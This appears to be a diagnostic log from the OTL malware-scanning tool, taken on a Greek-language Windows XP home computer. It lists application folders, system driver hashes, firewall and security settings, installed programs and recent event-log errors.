[2009/10/11 00:50:32 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Fugazo
[2009/11/09 15:04:44 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\FarmFrenzy-PizzaParty
[2009/12/07 22:57:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\NeoEdge Networks
[2005/03/13 13:08:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\ACD Systems
[2006/02/13 10:23:16 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Webshots
[2007/03/18 22:44:04 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Sony
[2007/03/18 22:45:28 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Publish Providers
[2007/04/17 14:47:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Lionhead Studios
[2007/11/07 16:47:40 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\BSplayer Pro
[2007/11/17 14:32:34 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Leadertech
[2008/07/02 20:44:00 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\ESET
[2008/09/05 13:04:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\SystemRequirementsLab
[2008/10/12 23:29:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\PlayFirst
[2008/11/04 00:09:18 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Pogo Games
[2009/01/12 22:08:46 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Gamelab
[2009/03/10 22:22:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\uTorrent
[2009/03/11 00:29:22 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\GOL_byHasbro
[2009/03/11 16:31:56 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\GamesCafe
[2009/05/11 17:25:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Oberon Games
[2010/01/08 18:28:20 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\BSplayer

========== Purity Check ==========



========== Custom Scans ==========


< %SYSTEMDRIVE%\*.exe >
[2001/05/24 12:59:30 | 000,162,304 | ---- | M] () -- C:\UNWISE.EXE


< MD5 for: AGP440.SYS >
[2008/10/27 15:36:00 | 022,311,867 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:AGP440.sys
[2009/01/12 16:07:52 | 023,920,796 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:AGP440.sys
[2008/10/27 15:36:00 | 022,311,867 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:AGP440.sys
[2009/01/12 16:07:52 | 023,920,796 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:AGP440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\ServicePackFiles\i386\agp440.sys
[2008/04/13 20:36:38 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=08FD04AA961BDC77FB983F328334E3D7 -- C:\WINDOWS\system32\drivers\agp440.sys
[2004/08/04 08:07:42 | 000,042,368 | ---- | M] (Microsoft Corporation) MD5=2C428FA0C3E3A01ED93C9B2A27D8D4BB -- C:\WINDOWS\$NtServicePackUninstall$\agp440.sys

< MD5 for: ATAPI.SYS >
[2002/09/30 12:00:00 | 010,188,778 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp1.cab:atapi.sys
[2008/10/27 15:36:00 | 022,311,867 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp2.cab:atapi.sys
[2009/01/12 16:07:52 | 023,920,796 | ---- | M] () .cab file -- C:\WINDOWS\Driver Cache\i386\sp3.cab:atapi.sys
[2002/09/24 13:42:10 | 010,188,778 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp1.cab:atapi.sys
[2008/10/27 15:36:00 | 022,311,867 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp2.cab:atapi.sys
[2009/01/12 16:07:52 | 023,920,796 | ---- | M] () .cab file -- C:\WINDOWS\ServicePackFiles\i386\sp3.cab:atapi.sys
[2002/09/30 12:00:00 | 000,086,912 | ---- | M] (Microsoft Corporation) MD5=95B858761A00E1D4F81F79A0DA019ACA -- C:\WINDOWS\system32\ReinstallBackups\0005\DriverFiles\i386\atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\ServicePackFiles\i386\atapi.sys
[2008/04/13 20:40:30 | 000,096,512 | ---- | M] (Microsoft Corporation) MD5=9F3A2F5AA6875C72BF062C712CFA2674 -- C:\WINDOWS\system32\drivers\atapi.sys
[2004/08/04 07:59:42 | 000,095,360 | ---- | M] (Microsoft Corporation) MD5=CDFE4411A69C224BD1D11B2DA92DAC51 -- C:\WINDOWS\$NtServicePackUninstall$\atapi.sys

< MD5 for: EVENTLOG.DLL >
[2004/09/04 15:45:02 | 000,055,808 | ---- | M] (Microsoft Corporation) MD5=6C85C5FC9D14B07E21A7D3EA8861CD93 -- C:\WINDOWS\$NtServicePackUninstall$\eventlog.dll
[2008/04/14 18:29:28 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=D863F2C887B64521B8E734E062BA79F2 -- C:\WINDOWS\ServicePackFiles\i386\eventlog.dll
[2008/04/14 18:29:28 | 000,056,320 | ---- | M] (Microsoft Corporation) MD5=D863F2C887B64521B8E734E062BA79F2 -- C:\WINDOWS\system32\eventlog.dll

< MD5 for: NETLOGON.DLL >
[2008/04/14 18:29:44 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=017BBF0DA6278CF8F278C30ADC6FB8CB -- C:\WINDOWS\ServicePackFiles\i386\netlogon.dll
[2008/04/14 18:29:44 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=017BBF0DA6278CF8F278C30ADC6FB8CB -- C:\WINDOWS\system32\netlogon.dll
[2004/09/04 15:45:10 | 000,407,040 | ---- | M] (Microsoft Corporation) MD5=E57F2E449533D8943D432720958A3706 -- C:\WINDOWS\$NtServicePackUninstall$\netlogon.dll

< MD5 for: SCECLI.DLL >
[2004/09/04 15:45:12 | 000,186,880 | ---- | M] (Microsoft Corporation) MD5=1BF213CBF53F8EE3B833EF9C70D3DC6D -- C:\WINDOWS\$NtServicePackUninstall$\scecli.dll
[2008/04/14 18:29:56 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=790E8153E8B872542D19BB7F0C0FBFD8 -- C:\WINDOWS\ServicePackFiles\i386\scecli.dll
[2008/04/14 18:29:56 | 000,187,904 | ---- | M] (Microsoft Corporation) MD5=790E8153E8B872542D19BB7F0C0FBFD8 -- C:\WINDOWS\system32\scecli.dll

< %systemroot%\*. /mp /s >

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\Tasks\*.job /lockedfiles >

< %systemroot%\system32\drivers\*.sys /lockedfiles >
[2009/01/12 16:24:50 | 000,096,384 | ---- | M] () Unable to obtain MD5 -- C:\WINDOWS\system32\drivers\sptd7533.sys
[2006/10/09 14:34:58 | 000,642,560 | ---- | M] () Unable to obtain MD5 -- C:\WINDOWS\system32\drivers\sptd.sys
[2006/10/09 14:36:34 | 000,223,128 | ---- | M] () Unable to obtain MD5 -- C:\WINDOWS\system32\drivers\dtscsi.sys

< %systemroot%\System32\config\*.sav >
[2005/03/13 12:09:08 | 000,413,696 | ---- | M] () -- C:\WINDOWS\system32\config\system.sav
[2005/03/13 12:09:08 | 000,634,880 | ---- | M] () -- C:\WINDOWS\system32\config\software.sav
[2005/03/13 12:09:08 | 000,094,208 | ---- | M] () -- C:\WINDOWS\system32\config\default.sav
< End of report >

EXTRAS.txt

OTL Extras logfile created on: 8/2/2010 10:14:32 μμ - Run 1
OTL by OldTimer - Version 3.1.28.0 Folder = C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000408 | Country: Ελλάδα | Language: ELL | Date Format: d/M/yyyy

511,00 Mb Total Physical Memory | 206,00 Mb Available Physical Memory | 40,00% Memory free
1,00 Gb Paging File | 1,00 Gb Available in Paging File | 78,00% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 24,40 Gb Total Space | 3,30 Gb Free Space | 13,53% Space Free | Partition Type: FAT32
Drive D: | 12,83 Gb Total Space | 3,31 Gb Free Space | 25,82% Space Free | Partition Type: FAT32
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
Drive I: | 232,83 Gb Total Space | 213,12 Gb Free Space | 91,53% Space Free | Partition Type: FAT32

Computer Name: HOME-VYXPNW9L30
Current User Name: Bougioukli Sofia
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Company Name Whitelist: On
Skip Microsoft Files: On
File Age = 14 Days
Output = Standard
Quick Scan

========== Extra Registry (SafeList) ==========


========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] --

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
htmlfile [edit] -- "C:\Program Files\Microsoft Office\Office10\msohtmed.exe" %1 (Microsoft Corporation)
htmlfile [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1" (Mozilla Corporation)
https [open] -- "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1" (Mozilla Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l (Microsoft Corporation)
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [ACDBrowse] -- "C:\Program Files\ACD Systems\ACDSee\7.0\ACDSee7.exe" "%1" (ACD Systems Ltd.)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [Winamp.Enqueue] -- "C:\Program Files\Winamp\winamp.exe" /ADD "%1" (Nullsoft)
Directory [Winamp.Play] -- "C:\Program Files\Winamp\winamp.exe" "%1" (Nullsoft)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 0
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"F:\HIW\stInstall.exe" = F:\HIW\stInstall.exe:*:Enabled:Thomson Home Install Wizard -- File not found
"C:\Program Files\Mozilla Firefox\firefox.exe" = C:\Program Files\Mozilla Firefox\firefox.exe:*:Enabled:Mozilla Firefox -- (Mozilla Corporation)
"C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" = C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe:*:Enabled:Yahoo! Messenger -- (Yahoo! Inc.)
"C:\Program Files\uTorrent\uTorrent.exe" = C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent -- (BitTorrent, Inc.)
"C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe" = C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe:*:Enabled:Sony Ericsson Media Manager 1.2 -- (Sony Creative Software Inc.)


========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{00120409-78E1-11D2-B60F-006097C998E7}" = Microsoft FrontPage 2000
"{00203668-8170-44A0-BE44-B632FA4D780F}" = Adobe AIR
"{01501EBA-EC35-4F9F-8889-3BE346E5DA13}" = MSXML4 Parser
"{01521746-02A6-4A72-00BD-A285DF6B80C6}" = The Sims 2 University
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}" = Java™ 6 Update 17
"{3248F0A8-6813-11D6-A77B-00B0D0160070}" = Java™ 6 Update 7
"{350C9408-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{4AE3A0CB-87B0-4F51-BECD-3D1F8DFDD62F}" = OTEnet-SAGEM Fast 800
"{5B09BD67-4C99-46A1-8161-B7208CE18121}" = QuickTime
"{5EC86106-2B0A-4595-B03C-15E2241C1AC5}_is1" = Community Expansion Pack version 1.01b
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6B629F70-BE1D-456E-AA97-73619020E7A1}" = Sony Sound Forge 7.0
"{6E7DD182-9FC6-4651-0095-2E666CC6AF35}" = The Sims 2
"{77DCDCE3-2DED-62F3-8154-05E745472D07}" = Acrobat.com
"{7C503E58-B2BC-11D5-978A-0050BA84F5F7}" = Neverwinter Nights
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{90110408-6000-11D3-8CFE-0050048383C9}" = Microsoft Office XP Professional
"{9EB1504E-FD95-4BCD-8E93-B4039F59C469}" = Sony Ericsson Media Manager 1.2
"{A1350B64-1AF8-497B-AC07-307DF67FB8D4}" = ESET Smart Security
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{AC64B069-151A-4E5B-9274-DF7ABD779578}" = Top Chef Demo
"{AC76BA86-7AD7-1033-7B44-A93000000001}" = Adobe Reader 9.3
"{AC76BA86-7AD7-5464-3428-900000000004}" = Spelling Dictionaries Support For Adobe Reader 9
"{B0625F16-B742-4F75-9FD8-20B47ACC7DE2}" = ACDSee 7.0 PowerPack
"{B2F5D08C-7E79-4FCD-AAF4-57AD35FF0601}" = Adobe Illustrator CS2
"{B74F042E-E1B9-4A5B-8D46-387BB172F0A4}" = Apple Software Update
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C950420B-4182-49EA-850A-A6A2ABF06C6B}" = Marvell Miniport Driver
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CE10CFE5-FA4B-4D01-B587-7EBB77505C7E}" = 3M Littmann Introduction to Heart Sounds
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{D958FAC4-BAE0-4B1D-A42E-DE9BFDE7DDEE}" = Canon PhotoRecord
"{DFEF49D9-FC95-4301-99B9-2FB91C6ABA06}" = The Sims™ 2 Seasons
"{EA4FA30B-7321-4428-90E9-28B088EC8DC9}" = Runtime 8.0 Libraries
"{FB08F381-6533-4108-B7DD-039E11FBC27E}" = Realtek AC'97 Audio
"Adobe Flash Player ActiveX" = Adobe Flash Player 10 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin
"Adobe Illustrator CS2" = Adobe Illustrator CS2
"Adobe SVG Viewer" = Adobe SVG Viewer 3.0
"Broken Sword" = Broken Sword
"BSPlayerf" = BS.Player FREE
"CANONBJ_Deinstall_CNMCP5y.DLL" = Canon PIXMA iP1500
"CCleaner" = CCleaner
"CDisplay_is1" = CDisplay 1.8
"CNXT_MODEM_PCI_VEN_14F1&DEV_2F00&SUBSYS_200414F1" = SoftK56 Data Fax Voice Speakerphone CARP
"com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1" = Acrobat.com
"dBpowerAMP AAC to Mp4 Codec" = dBpowerAMP AAC to Mp4 Codec
"dBpowerAMP Music Converter" = dBpowerAMP Music Converter
"dBpowerAMP Nero Mp4 Codec" = dBpowerAMP Nero Mp4 Codec
"Easy-PhotoPrint" = Canon Utilities Easy-PhotoPrint
"Easy-PrintToolBox" = Canon Utilities Easy-PrintToolBox
"Easy-WebPrint" = Easy-WebPrint
"Farm Frenzy Pizza Party1.0" = Farm Frenzy Pizza Party
"Hotel Dash - Suite Success" = Hotel Dash - Suite Success (remove only)
"IDNMitigationAPIs" = Microsoft Internationalized Domain Names Mitigation APIs
"ie7" = Windows Internet Explorer 7
"ie8" = Windows Internet Explorer 8
"Image Composer" = Microsoft Image Composer 1.5
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
"mgfrench2_is1" = MAGENTA - French-Greek-French Dictionary 2006
"mggld2006_is1" = MAGENTA - GOLDEN VERSION 2006 - English-Greek-English dictionar
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Mozilla Firefox (3.5.7)" = Mozilla Firefox (3.5.7)
"NeroMultiInstaller!UninstallKey" = Nero Suite
"NLSDownlevelMapping" = Microsoft National Language Support Downlevel APIs
"NOD32 v3.x FiX 1.1 by TemDono_is1" = NOD32 v3.x FiX 1.1 by TemDono (Free Updates - Expire in 2050)
"NVIDIA Drivers" = NVIDIA Drivers
"SystemRequirementsLab" = System Requirements Lab
"SYSTRAN Premium 4.0" = SYSTRAN Premium 4.0
"The Game Of Life by Hasbro1.0" = The Game Of Life by Hasbro
"Webshots Desktop" = Webshots Desktop
"Winamp" = Winamp
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows XP Service Pack" = Windows XP Service Pack 3
"WinRAR archiver" = WinRAR archiver
"WMFDist11" = Windows Media Format 11 runtime
"Wudf01000" = Microsoft User-Mode Driver Framework Feature Pack 1.0
"XviD_is1" = XviD MPEG-4 Video Codec
"Yahoo! Companion" = Yahoo! Toolbar
"Yahoo! Messenger" = Yahoo! Messenger
"Yahoo! Software Update" = Yahoo! Software Update

========== HKEY_CURRENT_USER Uninstall List ==========

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"uTorrent" = µTorrent

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 1/7/2009 2:02:39 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Application Error | ID = 1000
Description = Ελαττωματική εφαρμογή nwmain.exe, έκδοση 1.6.4.0, ελαττωματική λειτουργική
μονάδα nwmain.exe, έκδοση 1.6.4.0, ελαττωματική διεύθυνση 0x003cddd0.

Error - 30/8/2009 1:47:25 μμ | Computer Name = HOME-VYXPNW9L30 | Source = crypt32 | ID = 131083
Description = Αποτυχημένη εξαγωγή από το αρχείο cab αυτόματης ενημέρωσης, της ριζικής
λίστας άλλου κατασκευαστή: <http://www.download....uthrootstl.cab>
με σφάλμα: Ένα απαιτούμενο πιστοποιητικό δεν είναι εντός της περιόδου ισχύος του,
κατά την επαλήθευση με βάση το τρέχον ρολόι συστήματος ή τη χρονική σήμανση στο
υπογεγραμμένο αρχείο.

Error - 30/8/2009 1:47:25 μμ | Computer Name = HOME-VYXPNW9L30 | Source = crypt32 | ID = 131083
Description = Αποτυχημένη εξαγωγή από το αρχείο cab αυτόματης ενημέρωσης, της ριζικής
λίστας άλλου κατασκευαστή: <http://www.download....uthrootstl.cab>
με σφάλμα: Ένα απαιτούμενο πιστοποιητικό δεν είναι εντός της περιόδου ισχύος του,
κατά την επαλήθευση με βάση το τρέχον ρολόι συστήματος ή τη χρονική σήμανση στο
υπογεγραμμένο αρχείο.

Error - 16/10/2009 2:37:08 μμ | Computer Name = HOME-VYXPNW9L30 | Source = MsiInstaller | ID = 11711
Description = Προϊόν: Microsoft .NET Framework 2.0 Service Pack 2 -- Error 1711.Παρουσιάστηκε
σφάλμα κατά την εγγραφή των πληροφοριών εγκατάστασης στο δίσκο. Βεβαιωθείτε ότι
υπάρχει αρκετός διαθέσιμος χώρος στο δίσκο και κάντε κλικ στο κουμπί "Επανάληψη"
ή στο κουμπί "Άκυρο" για να τερματίσετε την εγκατάσταση.

Error - 16/10/2009 2:37:08 μμ | Computer Name = HOME-VYXPNW9L30 | Source = MsiInstaller | ID = 11711
Description = Προϊόν: Microsoft .NET Framework 2.0 Service Pack 2 -- Error 1711.Παρουσιάστηκε
σφάλμα κατά την εγγραφή των πληροφοριών εγκατάστασης στο δίσκο. Βεβαιωθείτε ότι
υπάρχει αρκετός διαθέσιμος χώρος στο δίσκο και κάντε κλικ στο κουμπί "Επανάληψη"
ή στο κουμπί "Άκυρο" για να τερματίσετε την εγκατάσταση.

Error - 16/10/2009 2:37:08 μμ | Computer Name = HOME-VYXPNW9L30 | Source = MsiInstaller | ID = 11711
Description = Προϊόν: Microsoft .NET Framework 2.0 Service Pack 2 -- Error 1711.Παρουσιάστηκε
σφάλμα κατά την εγγραφή των πληροφοριών εγκατάστασης στο δίσκο. Βεβαιωθείτε ότι
υπάρχει αρκετός διαθέσιμος χώρος στο δίσκο και κάντε κλικ στο κουμπί "Επανάληψη"
ή στο κουμπί "Άκυρο" για να τερματίσετε την εγκατάσταση.

Error - 16/10/2009 2:43:22 μμ | Computer Name = HOME-VYXPNW9L30 | Source = HotFixInstaller | ID = 5000
Description = EventType visualstudio8setup, P1 microsoft .net framework 2.0-kb974417,
P2 1032, P3 1618, P4 msi, P5 f, P6 9.0.40302.0, P7 install, P8 x86, P9 xp, P10
0.

Error - 7/12/2009 4:57:50 μμ | Computer Name = HOME-VYXPNW9L30 | Source = crypt32 | ID = 131083
Description = Αποτυχημένη εξαγωγή από το αρχείο cab αυτόματης ενημέρωσης, της ριζικής
λίστας άλλου κατασκευαστή: <http://www.download....uthrootstl.cab>
με σφάλμα: Παρουσιάστηκε εσωτερικό σφάλμα αλληλουχίας πιστοποιητικών.

Error - 7/1/2010 1:52:06 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Application Error | ID = 1000
Description = Ελαττωματική εφαρμογή winword.exe, έκδοση 10.0.2627.0, ελαττωματική
λειτουργική μονάδα winword.exe, έκδοση 10.0.2627.0, ελαττωματική διεύθυνση 0x00286044.

Error - 7/1/2010 2:33:17 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Microsoft Office 10 | ID = 1000
Description = Faulting application powerpnt.exe, version 10.0.2623.0, faulting module
powerpnt.exe, version 10.0.2623.0, fault address 0x0026cc2b.

[ System Events ]
Error - 8/2/2010 3:34:42 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452689
Description = Υπηρεσία Παροχής Χρόνου NtpClient: Παρουσιάστηκε ένα σφάλμα κατά την
αναζήτηση DNS του σταθμού 'time.windows.com,0x1' με μη αυτόματες ρυθμίσεις παραμέτρων.
Το NtpClient θα επιχειρήσει αναζήτηση DNS ξανά σε 15 λεπτά. Το σφάλμα ήταν: Επιχειρήθηκε
η εκτέλεση μιας λειτουργίας υποδοχής σε ένα κεντρικό υπολογιστή, ο οποίος δεν είναι
προσπελάσιμος. (0x80072751)

Error - 8/2/2010 3:34:42 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452701
Description = Η υπηρεσία παροχής χρόνου NtpClient έχει ρυθμιστεί να λαμβάνει ώρα
από μία ή περισσότερες προελεύσεις χρόνου, ωστόσο αυτή τη στιγμή δεν είναι προσπελάσιμη
καμία
από αυτές. Δεν θα γίνει καμία προσπάθεια επικοινωνίας με κάποια προέλευση χρόνου
για 15 λεπτά. Ο NtpClient δεν έχει προέλευση ακριβούς ώρας.

Error - 8/2/2010 4:03:41 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Service Control Manager | ID = 7000
Description = Δεν ήταν δυνατή η εκκίνηση της υπηρεσίας General Purpose USB Driver
(e4ldr.sys) εξαιτίας του ακόλουθου σφάλματος: %%2

Error - 8/2/2010 4:11:51 μμ | Computer Name = HOME-VYXPNW9L30 | Source = Service Control Manager | ID = 7000
Description = Δεν ήταν δυνατή η εκκίνηση της υπηρεσίας General Purpose USB Driver
(e4ldr.sys) εξαιτίας του ακόλουθου σφάλματος: %%2

Error - 8/2/2010 4:13:02 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452689
Description = Υπηρεσία Παροχής Χρόνου NtpClient: Παρουσιάστηκε ένα σφάλμα κατά την
αναζήτηση DNS του σταθμού 'time.windows.com,0x1' με μη αυτόματες ρυθμίσεις παραμέτρων.
Το NtpClient θα επιχειρήσει αναζήτηση DNS ξανά σε 15 λεπτά. Το σφάλμα ήταν: Επιχειρήθηκε
η εκτέλεση μιας λειτουργίας υποδοχής σε ένα κεντρικό υπολογιστή, ο οποίος δεν είναι
προσπελάσιμος. (0x80072751)

Error - 8/2/2010 4:13:02 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452701
Description = Η υπηρεσία παροχής χρόνου NtpClient έχει ρυθμιστεί να λαμβάνει ώρα
από μία ή περισσότερες προελεύσεις χρόνου, ωστόσο αυτή τη στιγμή δεν είναι προσπελάσιμη
καμία
από αυτές. Δεν θα γίνει καμία προσπάθεια επικοινωνίας με κάποια προέλευση χρόνου
για 14 λεπτά. Ο NtpClient δεν έχει προέλευση ακριβούς ώρας.

Error - 8/2/2010 4:13:02 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452689
Description = Υπηρεσία Παροχής Χρόνου NtpClient: Παρουσιάστηκε ένα σφάλμα κατά την
αναζήτηση DNS του σταθμού 'time.windows.com,0x1' με μη αυτόματες ρυθμίσεις παραμέτρων.
Το NtpClient θα επιχειρήσει αναζήτηση DNS ξανά σε 15 λεπτά. Το σφάλμα ήταν: Επιχειρήθηκε
η εκτέλεση μιας λειτουργίας υποδοχής σε ένα κεντρικό υπολογιστή, ο οποίος δεν είναι
προσπελάσιμος. (0x80072751)

Error - 8/2/2010 4:13:02 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452701
Description = Η υπηρεσία παροχής χρόνου NtpClient έχει ρυθμιστεί να λαμβάνει ώρα
